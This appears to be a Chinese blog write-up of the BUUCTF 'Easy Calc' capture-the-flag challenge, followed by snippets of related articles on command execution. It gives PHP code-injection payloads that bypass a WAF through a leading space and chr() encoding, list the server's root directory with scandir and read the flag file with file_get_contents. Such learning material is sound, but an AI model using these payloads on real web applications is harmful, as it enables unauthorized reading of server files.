做题记录命令执行buuctfEasy Calc

已于 2022-04-06 00:41:55 修改
阅读量3.6k 收藏 1
点赞数 1
分类专栏: 笔记 命令执行 文章标签: 前端 大数据 php
于 2022-03-25 00:42:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zbbjya/article/details/123724865
版权

题目Easy Calc

在这里插入图片描述查看源代码
给提示url 还有 waf绕过

在这里插入图片描述

发现过滤了许多东西
在这里插入图片描述查看根目录发现了flag然后我们将
在这里插入图片描述用 file_get_contents() 函数先读取文件为字符串然后用 var_dump 显示字符串得到 flag
构造playload然后得到flag
在这里插入图片描述

题目总结

首先我们要发现是题目给的提示,当查看源代码的时候好好的去看,然后我们看到有一个waf绕过,
在不知道的情况下我们要去了解一下什么是waf绕过
然后打开php文件查看源码时命令执行的一种方式我们
根据提示开始分析看题目的函数与所写内容和过滤了哪些字符,为下面的构造做好准备

calc.php?num=addf

首先这个就是错误的根据waf绕过我们可以清楚的知道在waf绕过中waf 不允许 num 变量传递字母
然后将变为前面打一个空格就可以将其变为不单是字母,也就是它已经不是字母了这个是可以绕过了
但是这里我们就会有一个疑问就是我们可以看到之前是有过滤了空格,为什么这里我们还要打空格呢我 的理解是这个空格是打在num之前的,对过滤无效,并且在执行的过程中是会被注释掉的所以无影响

calc.php? num=addf

然后我们开始查看文件根目录

calc.php? num=var_dump(scandir(chr(47)))

var_dump()此函数显示关于一个或多个表达式的结构信息包括表达式的类型与值。数组将递归展开值通过缩进显示其结构。
scandir()返回指定目录中的文件和目录中的数组
chr(47) 根目录 因为根目录/被过滤了所以我们使用ascii中的来代替
这个代码的意思就是查看并返回根目录中的文件
当我们查看打文件中包含着flag的文件时要将flag显示出来

calc.php? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

chr(47) 根目录 /
chr(102)f
.chr(49)1
.chr(97).a
chr(103).g
chr(103)g

calc.php? num=var_dump(file_get_contents(/f1agg))
将Ff1agg文件的内容读入一个字符中

file_get_contents()将整个文件读入到一个字符串中

目前缺乏

对函数了解不够

file_get_contents()
var_dump()
scandir()
要时常复习孰能生巧

waf绕过再深入了解一下

zbbjya
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java命令执行浅析
Au
11-03 1931
Java命令执行浅析 一、JAVA执行命令的几种方式 1、java.lang.Runtime Runtime.getRuntime().exec("calc"); Runtime.getRuntime().exec(new String[]{"cmd", "/c", "whoami"}); [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cppOaxie-1604401873787)(D:\Users\sangfor\Desktop\JAVA命令执行\image-20201
java执行js导致命令执行1
08-03
Java执行JS导致命令执行的机理剖析 Java执行JS导致命令执行是一个非常重要的知识点,今天我们将详细探讨这个知识点的机理和实现方式。 首先,让我们回顾一下之前讨论的XMLDecoder序列化的底层,特别是Expression类...
命令执行
m0_55854679的博客
08-10 3721
漏洞原理 部分Web应用程序提供了一些命令执行的操作,例如,想要测试http://www.example.com是否可以正常连接,那么Web应用程序底层就很可能去调用系统操作命令,如果此处没有过滤好用户输入的数据,就很有可能形成系统命令执行漏洞。程序中因为某些功能需要执行系统命令,并通过网页传递参数到后台执行。然而最根本的原因是没有对输入框中的内容进行过滤,导致出现该漏洞,正常情况下输入框只能接收指定类型的数据。 漏洞概述 攻击者通过web应用可以执行系统命令,从而获得敏感信息,进而控制服务器攻击内网。 漏
Windows下载执行命令大全
闵行小鱼塘
08-04 5971
转载的执行命令大全
Web安全-命令执行漏洞
道阻且长,行则将至。
02-03 4462
概述 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 漏洞成因:脚本语言优点是简洁,方便,但也伴随着一些问题,如速度慢,无法解除系统底层,如果我们开发的应用需要一些除去web的特殊功能时,就需要调用一...
linux的calc命令,Linux命令行中使用计算器的方法:用bc,calc,expr,gcalccmd,qalc命令
weixin_28995873的博客
04-30 1403
如果你需要在Linux命令行中使用计算器,那就按本文介绍的方法操作,用bc、calc、expr、gcalccmd、qalc命令,有些需要安装就可以用来去处了,这些命令行计算器允许我们执行所有类型的操作,例如科学、财务或甚至简单的计算,此外,我们可以在shell脚本中使用这些命令进行复杂的数学运算。简介在本文中,我列出几个命令行计算器命令:1、bc:任意精度计算器语言2、calc:任意精度计算器3、...
java调用执行windows命令
zwrlj527的专栏
05-22 6024
序: 先说说这个场景,其实我想的是不用远程连接服务器。通过其他活着的服务搞事情,理论上应该是所有的命令都可以执行的。我这里只是试验性的,可行性,所以我就做了个每次执行一条命令的。 一、先说说使用的执行器 这里没有使用第三方的jar,直接使用的是jdk提供的Process。先看我写的工具类吧,我这里因为服务器是windows,所以用的编码是gkb2312的。不过保留了支持...
渗透测试技术----常见web漏洞--命令执行原理及防御
wwl012345的博客
08-15 2631
一、命令执行漏洞介绍 1.命令执行漏洞简介 命令执行漏洞时指服务器没有对执行命令进行过滤,用户可以随意执行系统命令命令执行漏洞属于高危漏洞之一,也属于代码执行的范围内。 2.命令执行漏洞的原理 应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用System()、exec()、shell_exec()、passthru()、popen()、proc_popen()等函数可以执行...
Java执行系统命令
谢公子的博客
07-13 2281
在Java的反序列化远程代码执行过程中,最终就是通过调用Runtime类的exec函数来执行系统命令
利用DCOM实现远程命令执行
热门推荐
Shanfenglan's blog
11-17 9万+
CATALOG1.前言2.实现过程2.1通过DCOM在本机执行命令2.2通过DCOM控制远程主机执行命令3.参考文章 1.前言 实现命令执行的方式之前我写过文章来总结,前两天又发现了一个新方法DCOM,于是有了这篇文章。 2.实现过程 2.1通过DCOM在本机执行命令 实现条件: 管理员权限的powershell 查找DCOM组件MMC Application Class如下图,命令为 Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplic
ES6记录异步函数的执行时间详解
11-25
calc 是一个我们想要做剖析(性能分析)的异步函数。按照惯例,它的最后一个参数是一个callback。我们像这样使用 calccalc(arg, (err, res) => console.log(err || res)) 或许,最简单的对 calc 这样的函数来...
my_calc.rar_calc
09-24
而“rar_calc”则可能表明这个项目是以RAR压缩格式存储,且包含一个名为“calc”的特定部分或文件,这通常是源代码、可执行文件或者相关的配置文件。 Delphi7作为Windows应用程序的主要开发工具,它提供了直观的...
windows运行里面执行命令.txt
11-06
在探讨《Windows运行里面执行命令》这一主题时,我们实际上是在深入了解Windows操作系统中的各种内置命令,这些命令能够帮助用户进行系统维护、故障排查、资源管理以及网络配置等操作。以下是从给定文件中提取并...
CSS3的calc()做响应模式布局的实现方法
12-13
REM方法 calc()从字面我们可以把他理解为一个函数function。其实calc是英文单词... calc()能让你给元素的做计算,你可以给一个div元素,使用百分比、em、px和rem单位值计算出其宽度或者高度,比如说“width:ca
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 431
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
js、ts、argular、nodejs学习心得
最新发布
07-30 215
工作中需要前端argular开发桌面程序,后端用nodejs开发服务器,商用软件架构。
苍穹外卖浏览器前端界面修改
程序员象漂亮的博客
07-25 278
客户原始方案是期望做一个Spring Boot + Vue的饿了么系统,但时间上太仓促,所以建议选择开源的苍穹外码目作为作业提交。客户接受了建议的方案后,期望对前端页面提出了一些个性化的定制修改。
基于上云api前端开发经验教训(loading...)
IIIIIAN
07-26 447
对于上云api开发学习过程中的错误教训积累总结
怎么在批处理中使用calc做除法
05-25
在批处理中使用 `calc` 做除法可以通过以下步骤实现: 1. 打开命令提示符或批处理窗口。 2. 输入下面的命令,其中 `%num1%` 和 `%num2%` 分别代表要做除法的两个数: ``` set /p num1=请输入第一个数字: set /p num2=请输入第二个数字: ``` 3. 输入下面的命令,以计算结果: ``` set /a result=%num1%/%num2% ``` 4. 输入下面的命令,以输出结果: ``` echo 结果为:%result% ``` 完整的批处理命令如下所示: ``` @echo off set /p num1=请输入第一个数字: set /p num2=请输入第二个数字: set /a result=%num1%/%num2% echo 结果为:%result% pause ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值